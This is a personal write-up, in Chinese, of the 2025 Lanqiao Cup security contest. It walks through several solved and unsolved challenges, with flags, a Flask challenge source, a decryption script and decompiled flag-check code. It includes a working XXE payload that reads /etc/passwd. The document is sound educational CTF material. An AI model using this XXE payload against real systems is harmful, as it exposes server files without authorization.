第十六周蓝桥杯2025网络安全赛道

因为只会web，其他方向都没碰过，所以只出了4道

做出来的：

ezEvtx

找到一个被移动的文件，疑似被入侵

提交flag{confidential.docx}成功解出

flag{confidential.docx}

Flowzip

过滤器搜索flag找到flag

flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}

Enigma

将加密后的密文丢进cyberchef，选择Enigma，解出明文

flag{HELLOCTFERTHISISAMESSAGEFORYOU}

星际XML解析器

<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
<user>&xxe;</user>
</message>

xxe语句测试，成功访问到根目录下的flag文件

flag{232d46ad-bc55-4484-a134-45c8f54b2622}

没做出来的：

密室黑客逃脱：

快进到得到源码

import os
from flask import Flask, request, render_template
from config import *
# author: gamelabapp = Flask(__name__)# 模拟敏感信息
sensitive_info = SENSITIVE_INFO# 加密密钥
encryption_key = ENCRYPTION_KEYdef simple_encrypt(text, key):encrypted = bytearray()for i in range(len(text)):char = text[i]key_char = key[i % len(key)]encrypted.append(ord(char) + ord(key_char))return encrypted.hex()encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)# 模拟日志文件内容
log_content = f"用户访问了 /secret 页面，可能试图获取 {encrypted_sensitive_info}"# 模拟隐藏文件内容
hidden_file_content = f"解密密钥: {encryption_key}"# 指定安全的文件根目录
SAFE_ROOT_DIR = os.path.abspath('/app')
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:f.write(hidden_file_content)@app.route('/')
def index():return render_template('index.html')@app.route('/logs')
def logs():return render_template('logs.html', log_content=log_content)@app.route('/secret')
def secret():return render_template('secret.html')@app.route('/file')
def file():file_name = request.args.get('name')if not file_name:return render_template('no_file_name.html')full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:return render_template('no_premission.html')try:with open(full_path, 'r') as f:content = f.read()return render_template('file_content.html', content=content)except FileNotFoundError:return render_template('file_not_found.html')if __name__ == '__main__':app.run(debug=True, host='0.0.0.0')

获得密钥和密文后就可以编写解密程序了

def simple_decrypt(encrypted_hex, key):encrypted_bytes = bytearray.fromhex(encrypted_hex)decrypted = bytearray()for i in range(len(encrypted_bytes)):encrypted_char = encrypted_bytes[i]key_char = key[i % len(key)]decrypted.append(encrypted_char - ord(key_char))return decrypted.decode('utf-8')print(simple_decrypt("d9d1c4d9e0abc2a497df9a9a6c5fa4c9c9a592a8c39ccba6709b6b98a0c7c6d89cd994a39aae6f6f68af", "secret_key8672"))# flag{7c92fbd5-1df3-4d1f-8e4f-bcf7e5855791}

解密程序不会写偷了一个，这个没得说，没有AI，我又没学过密码，确实不太会解密

ShadowPhases

现在复盘看，当时没看这道题真牛魔可惜，50分送到嘴边了都没要QaQ

下载下来exe文件检查没有壳直接丢进IDA

int __fastcall main(int argc, const char **argv, const char **envp)
{char Str1[128]; // [rsp+30h] [rbp-50h] BYREFchar Str2[128]; // [rsp+B0h] [rbp+30h] BYREFvoid *v6; // [rsp+130h] [rbp+B0h]void *v7; // [rsp+138h] [rbp+B8h]void *v8; // [rsp+140h] [rbp+C0h]void *v9; // [rsp+150h] [rbp+D0h]void *v10; // [rsp+158h] [rbp+D8h]void *v11; // [rsp+160h] [rbp+E0h]char v12[13]; // [rsp+16Eh] [rbp+EEh] BYREFchar v13[15]; // [rsp+17Bh] [rbp+FBh] BYREFchar Src[5]; // [rsp+18Ah] [rbp+10Ah] BYREFchar v15[9]; // [rsp+18Fh] [rbp+10Fh] BYREFvoid *v16; // [rsp+198h] [rbp+118h]void *v17; // [rsp+1A0h] [rbp+120h]void *Block; // [rsp+1A8h] [rbp+128h]char v19[6]; // [rsp+1B2h] [rbp+132h] BYREFsize_t v20; // [rsp+1B8h] [rbp+138h]size_t v21; // [rsp+1C0h] [rbp+140h]size_t Size; // [rsp+1C8h] [rbp+148h]sub_401B10(argc, argv, envp);Src[0] = 0;Src[1] = 5;Src[2] = -125;Src[3] = 0x80;Src[4] = -114;strcpy(v15, "+");v15[2] = -125;v15[3] = 47;v15[4] = -86;v15[5] = 43;v15[6] = -127;v15[7] = -88;v15[8] = -91;Size = 14i64;v13[0] = 19;v13[1] = 57;v13[2] = -66;v13[3] = -66;v13[4] = -76;v13[5] = 56;v13[6] = -72;v13[7] = -70;v13[8] = -69;v13[9] = -76;v13[10] = 62;v13[11] = -112;v13[12] = 58;v13[13] = -70;v13[14] = -76;v21 = 15i64;v12[0] = -117;v12[1] = -119;v12[2] = 34;v12[3] = -120;v12[4] = -117;v12[5] = 32;v12[6] = 9;v12[7] = 34;v12[8] = -120;v12[9] = 8;v12[10] = -115;v12[11] = -120;v12[12] = -81;v20 = 13i64;v19[5] = -103;v19[4] = -35;v19[3] = -1;qmemcpy(v19, "\"Df", 3);Block = malloc(0xFui64);v17 = malloc(v21 + 1);v16 = malloc(v20 + 1);if ( !Block || !v17 || !v16 ){puts(Buffer);exit(1);}memcpy(Block, Src, Size);memcpy(v17, v13, v21);memcpy(v16, v12, v20);sub_4015B6(Block, Size, (unsigned __int8)v19[2]);sub_4015B6(v17, v21, (unsigned __int8)v19[1]);sub_4015B6(v16, v20, (unsigned __int8)v19[0]);*((_BYTE *)Block + Size) = 0;*((_BYTE *)v17 + v21) = 0;*((_BYTE *)v16 + v20) = 0;v9 = v17;v10 = v16;v11 = Block;v6 = Block;v7 = v17;v8 = v16;sub_401550(Str2, 128i64, "%s%s%s", (const char *)Block, (const char *)v17, (const char *)v16);printf("请输入 flag: ");scanf("%127s", Str1);if ( !strcmp(Str1, Str2) )puts(asc_40502A);elseputs(asc_405031);free(Block);free(v17);free(v16);return 0;
}

伪C长这样，简单看一下，猜测在if ( !strcmp(Str1, Str2) )这里有flag值，在这里加断点进行动态调试

最后在栈的这里找到flag（虽然不知道为什么我看他们的是和在一行的，我的是分开的，但是只要拿到flag就好）

BashBreaker

这个题抽象的没边，不看了

RuneBreach

沟槽的pwn，不看了

crawler

两解题，当然不是我能做的

Jdbc_once

零解，可能出题方不出一个零解题出题方心里不得劲

剩下两道密码也是看都看不懂喵，但是easy_AES后面又被py烂了，咸鱼又发力了，给我的排名最后半小时挤下去150（不嘻嘻）